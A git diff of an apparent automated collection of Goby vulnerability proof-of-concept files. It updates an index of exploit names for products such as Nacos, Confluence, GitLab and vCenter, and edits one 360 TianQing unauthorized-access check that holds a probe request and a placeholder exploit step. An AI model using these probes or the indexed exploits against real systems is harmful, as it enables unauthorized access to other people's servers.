diff --git a/README.md b/README.md
index 1c019db..dd6f807 100644
--- a/README.md
+++ b/README.md
@@ -1,48 +1,48 @@
-## goby poc (共935个) 最近一次检查时间 2023-03-19 05:12:23
+## goby poc (共935个) 最近一次检查时间 2023-03-20 05:12:22
### 收集记录
| 文件名称 | 收录时间 |
| :----| :---- |
-| [alibaba_canal_default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:30 |
-| [Apache_Kylin_Console_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:30 |
-| [Konga_Default_JWT_KEY.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:30 |
-| [VMWare_Operations_vRealize_Operations_Manager_API
_SSRF_CVE_2021_21975.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Active_UC_index.action_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [ClickHouse_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Aspcms_Backend_Leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Alibaba_Nacos_Default_password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [OpenSNS_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [IceWarp_WebClient_basic_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Consul_Rexec_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Discuz_v72_SQLI.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608
4.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [360_TianQing_ccid_SQL_injectable.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Apache_Kylin_Unauthorized_configuration_disclosur
e.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [YAPI_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [H3C_IMC_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [VENGD_Arbitrary_File_Upload.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Cacti_Weathermap_File_Write.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Security_Devices_Hardcoded_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [RuoYi_Druid_Unauthorized_access.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Docker_Registry_API_Unauth.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [360_Tianqing_database_information_disclosure.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Datang_AC_Default_Password.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Apache_Airflow_Unauthorized.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Weaver_OA_8_SQL_injection.json](https://github.com/cqr-cryeye-forks/goby-pocs) | 2023-03-19 05:10:29 |
-| [Apache_Solr_File_Read.go](https://github.com/qingchenhh/qc_poc) | 2023-03-18 05:10:04 |
+| [Apache_Solr_File_Read.go](https://github.com/qingchenhh/qc_poc) | 2023-03-20 05:10:55 |
+| [VMWare_Operations_vRealize_Operations_Manager_API
_SSRF_CVE_2021_21975.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Active_UC_index.action_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Lanproxy_Directory_traversal_CVE_2021_3019.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [DedeCMS_Carbuyaction_FileInclude.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [ClickHouse_SQLI.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Aspcms_Backend_Leak.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Alibaba_Nacos_Default_password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Jitong_EWEBS_phpinfo_leak.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [OpenSNS_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Alibaba_Nacos_Add_user_not_authorized.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [IceWarp_WebClient_basic_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Consul_Rexec_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Discuz_v72_SQLI.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Atlassian_Confluence_OGNL_injection_CVE_2021_2608
4.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [360_TianQing_ccid_SQL_injectable.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [GitLab_SSRF_CVE_2021_22214.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Discuz_Wechat_Plugins_Unauth.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [IRDM4000_Smart_station_Unauthorized_access.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Apache_Kylin_Unauthorized_configuration_disclosur
e.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [YAPI_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [H3C_IMC_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Fastmeeting_Arbitrary_File_Read.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [VENGD_Arbitrary_File_Upload.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [FineReport_v9_Arbitrary_File_Overwrite.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [fahuo100_sql_injection_CNVD_2021_30193.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Cacti_Weathermap_File_Write.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Security_Devices_Hardcoded_Password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [RuoYi_Druid_Unauthorized_access.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Docker_Registry_API_Unauth.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [360_Tianqing_database_information_disclosure.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Samsung_WLAN_AP_WEA453e_RCE.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Datang_AC_Default_Password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [VMware_vCenter_v7.0.2_Arbitrary_File_Read.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Discuz_RCE_WOOYUN_2010_080723.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Apache_Airflow_Unauthorized.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Weaver_OA_8_SQL_injection.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [alibaba_canal_default_password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Apache_Kylin_Console_Default_password.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [Konga_Default_JWT_KEY.json](https://github.com/wzqawp/https-github.com-lal0ne-HW) | 2023-03-20 05:10:52 |
+| [SonarQube_unauth_CVE_2020_27986.json](https://github.com/dzxindex/goby_poc) | 2023-03-20 05:10:49 |
| [yonyou_NC_BeanShell_RCE.go](https://github.com/qingchenhh/qc_poc) | 2023-03-18 05:10:04 |
| [Alibaba_Nacos_Default_password.go](https://github.com/qingchenhh/qc_poc) | 2023-03-18 05:10:04 |
| [Joomla_Rest_API__Unauthorized.go](https://github.com/qingchenhh/qc_poc) | 2023-03-17 05:12:42 |
diff --git a/data.json b/data.json
index 6e0cb30..b6dc07b 100644
--- a/data.json
+++ b/data.json
@@ -4459,11 +4459,6 @@
"from": "https://github.com/qingchenhh/qc_poc",
"up_time": "2023-03-17 05:12:42"
},
- "f2ef89406e066c3ae5f426458a060d28": {
- "name": "Apache_Solr_File_Read.go",
- "from": "https://github.com/qingchenhh/qc_poc",
- "up_time": "2023-03-18 05:10:04"
- },
"0c08c81622022768c2440eac655fbc3d": {
"name": "yonyou_NC_BeanShell_RCE.go",
"from": "https://github.com/qingchenhh/qc_poc",
@@ -4474,204 +4469,209 @@
"from": "https://github.com/qingchenhh/qc_poc",
"up_time": "2023-03-18 05:10:04"
},
- "a95b89986a79c91a7f59d9d75ec942ac": {
- "name": "VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
- },
- "87adadd634cc919ad6b5e7b4842bb35e": {
- "name": "Active_UC_index.action_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
- },
- "e646ceb6b2a9ec480bbd4623d4325f32": {
- "name": "Lanproxy_Directory_traversal_CVE_2021_3019.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
- },
- "434ec564211e33791d5e1961f1b3ebb8": {
+ "f01ced36d8b3caefb829354bd6fd7fc1": {
"name": "SonarQube_unauth_CVE_2020_27986.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/dzxindex/goby_poc",
+ "up_time": "2023-03-20 05:10:49"
},
- "c22a7eded164de18b9b08b1073c24a48": {
+ "698f8ae7a4aff0669896491d060b9d0f": {
+ "name": "VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json",
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "c07ba5da657d52f1ee2bf6104750c3f4": {
+ "name": "Active_UC_index.action_RCE.json",
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "9e734128624dc8dd76a46831a7e9721a": {
+ "name": "Lanproxy_Directory_traversal_CVE_2021_3019.json",
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "513fef84b397b9714253b3b368179e20": {
"name": "DedeCMS_Carbuyaction_FileInclude.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "9ab5251e9bd107631260838907f894be": {
+ "4d77792cc7287d63774faee7f1395bef": {
"name": "ClickHouse_SQLI.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "79733cc4aef1d73f095647ddd6902224": {
+ "85c8494e7b893bc0b65badffbc549556": {
"name": "Aspcms_Backend_Leak.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b5a392b27a98471d7a85fceb83f8c2bb": {
+ "bdd884a8409510102c311e67bf8fbf35": {
"name": "Alibaba_Nacos_Default_password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "30e31bbcb3e3a1c3e726c8712dc9a413": {
+ "1386b44e85f2afe55acb33cdc6dd26e5": {
"name": "Jitong_EWEBS_phpinfo_leak.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "c11dc72c6b76260ea064ec6d065c2c4e": {
+ "ddaeaa89570178bc8ac021dee5c446a2": {
"name": "OpenSNS_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "9d9add12c6a10caa7b95737ddc272dad": {
+ "937d584fb24d1ab86aea5cfbe2300af8": {
"name": "Alibaba_Nacos_Add_user_not_authorized.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "5e17ce4d593835c34fc2ed48eb6ff481": {
+ "41237e0d7696201d59664dd219abd3cb": {
"name": "IceWarp_WebClient_basic_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b3c4ed50cda74c9f027bd85463dc5986": {
+ "fed516d8fa1974abb4ac2f1fd3d80800": {
"name": "Consul_Rexec_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "cd7c79c4a8f5954dfc9b94e5572cf7a8": {
+ "96d085787d489b574554b16d4faa9882": {
"name": "Discuz_v72_SQLI.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "536988b739b6d41934e36855a7f359ee": {
+ "5862dcc3f7516a20a57490e6fa4d7690": {
"name": "Atlassian_Confluence_OGNL_injection_CVE_2021_26084.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "8f0b5dc58420ec1e6bf9d5eebb198546": {
+ "c667250e8ec2a946aaaee7879a88a541": {
"name": "360_TianQing_ccid_SQL_injectable.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "49963f2392dff43d6ba9478a39ef9b54": {
+ "1114c43aff54e07c9c7bc5511f86a154": {
"name": "GitLab_SSRF_CVE_2021_22214.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "4e566c87e02a8d2eae142e7f2c57e962": {
+ "566c622e106572be52c49ea3fc279874": {
"name": "Discuz_Wechat_Plugins_Unauth.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "f05c778d0dec965304b0652b2ecadc46": {
+ "68ba57a4bd670c0c42c35d21e4f5dc26": {
"name": "IRDM4000_Smart_station_Unauthorized_access.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "bdd6387e6ebfdc1d155e0d80a4afe068": {
+ "d6bad5f70686858fd05c9e312dfabdb6": {
"name": "Apache_Kylin_Unauthorized_configuration_disclosure.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "87a7cd5e962fbfbaf8d239ba4471ba25": {
+ "f4b060111ff19956236844be0e0d0eef": {
"name": "YAPI_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b69a1315894702869a7e904234655abf": {
+ "cd97b511ed98de73cc7b9c89e9f48218": {
"name": "H3C_IMC_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "e4a9fa38a80c8efb2728562e7f347ba5": {
+ "d50c1b89c61b3b68b5d1181a6841af52": {
"name": "Fastmeeting_Arbitrary_File_Read.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "cac943f12f9ed2f205014ff87fbbc35b": {
+ "55ad80db239956a843223438a850ac04": {
"name": "VENGD_Arbitrary_File_Upload.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "63e384aaef52dc2beac087d21740d2ea": {
+ "5fcf6c18ba2d72c0c7ae722c9e76a517": {
"name": "FineReport_v9_Arbitrary_File_Overwrite.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "3e8c98edb79eb77daa6b45d8d70f03a3": {
+ "919d80e8c84e30fd9638679cdee90caa": {
"name": "fahuo100_sql_injection_CNVD_2021_30193.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "4181aeaee11b9ea93856a49a8e0159be": {
+ "8b236a6f58657465085590d4b5c1e244": {
"name": "Cacti_Weathermap_File_Write.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "33322c6293c00e0177f01ac3889dd0e9": {
+ "fcbf0d616b0057f605aec56bedf7f368": {
"name": "Security_Devices_Hardcoded_Password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "2f341afe61cba3b5b2104d60e41083b2": {
+ "01f0fb1ab3f35ddf53969011a3553c07": {
"name": "RuoYi_Druid_Unauthorized_access.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "12dc028570c676ed6304d2b56f219c1e": {
+ "9f64f2d8bf3a124e1ebf2d4395870ca0": {
"name": "Docker_Registry_API_Unauth.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "b1ae8cb2f529f5eee60bf5c30d1e2df0": {
+ "1afa191a8421b3c5bc7c4da97b6235bc": {
"name": "360_Tianqing_database_information_disclosure.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "465626f5ffd33c92d2b540083c0fc479": {
+ "db406159976a18c09450d5e134706387": {
"name": "Samsung_WLAN_AP_WEA453e_RCE.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "534f7819797de150b1c0411dd4a2c869": {
+ "52266baa33db1cf175f371903e5a1aa9": {
"name": "Datang_AC_Default_Password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "5b6f0bfa4927b535a749e3d7f76faca4": {
+ "3b1db00d2d2247346b3f1d417569b8ce": {
"name": "VMware_vCenter_v7.0.2_Arbitrary_File_Read.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "cae0710ea595f0910a36af1981e6e296": {
+ "0adbc3de8b02a58343f6a3fc5eabda45": {
"name": "Discuz_RCE_WOOYUN_2010_080723.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "ec3a00491923a14f6cb1d9d44c09c6ac": {
+ "00e57ee9b2dd0e50d2d41464d79b05f1": {
"name": "Apache_Airflow_Unauthorized.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "0b8fcbde235a2adad1aff3dc1080467e": {
+ "4c4cbf98683b8bfadc80ee4231dbb779": {
"name": "Weaver_OA_8_SQL_injection.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:29"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "50b9e8e21d6f76d37b80f189ed8664d1": {
+ "5a1f57f97b1337ac13f038768b9c46e5": {
"name": "alibaba_canal_default_password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:30"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "eccacf2cea1bb6a40088b1f9e43fe595": {
+ "c53bd0683e3ae4a6181040f5952445dd": {
"name": "Apache_Kylin_Console_Default_password.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:30"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
},
- "63e7fcd14c98d13658565ac3aa5126f0": {
+ "8211bdcd16f68a1fb2549e5df9e4f3c7": {
"name": "Konga_Default_JWT_KEY.json",
- "from": "https://github.com/cqr-cryeye-forks/goby-pocs",
- "up_time": "2023-03-19 05:10:30"
+ "from": "https://github.com/wzqawp/https-github.com-lal0ne-HW",
+ "up_time": "2023-03-20 05:10:52"
+ },
+ "885772a015a908b1d7b8d3ad4aaf4379": {
+ "name": "Apache_Solr_File_Read.go",
+ "from": "https://github.com/qingchenhh/qc_poc",
+ "up_time": "2023-03-20 05:10:55"
}
}
\ No newline at end of file
diff --git a/poc/360_TianQing_ccid_SQL_injectable.json b/poc/360_TianQing_ccid_SQL_injectable.json
index d1e079b..779eaec 100644
--- a/poc/360_TianQing_ccid_SQL_injectable.json
+++ b/poc/360_TianQing_ccid_SQL_injectable.json
@@ -1,17 +1,23 @@
{
"Name": "360 TianQing ccid SQL injectable",
"Level": "2",
- "Tags": [],
- "GobyQuery": "app=\"360-TianQing\"",
- "Description": "The attacker can get the server permission by injecting SQL into the upload Trojan",
- "Product": "360 TianQing",
- "Homepage": "htp://360.cn",
- "Author": "PeiQi",
- "Impact": "
The attacker can get the server permission by injecting SQL into the upload Trojan
undefined
", - "References": [ - "http://wiki.peiqi.tech" - ], + "Description": "", + "Product": "360 TianQing", + "Homepage": "https://360.net/product-center/Endpoint-Security/management-system", + "Author": "", + "Impact": "Tianqing has unauthorized unauthorized unauthorized access, resulting in the disclosure of sensitive information.", + "Recommendation": "update", + "References": [], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/api/dbstat/gettablessize", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -62,6 +66,43 @@ "SetVariable": [] } ], - "PostTime": "2021-04-08 16:04:28", - "GobyVersion": "1.8.255" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/poc/Active_UC_index.action_RCE.json b/poc/Active_UC_index.action_RCE.json index 496366f..5e85e6a 100644 --- a/poc/Active_UC_index.action_RCE.json +++ b/poc/Active_UC_index.action_RCE.json 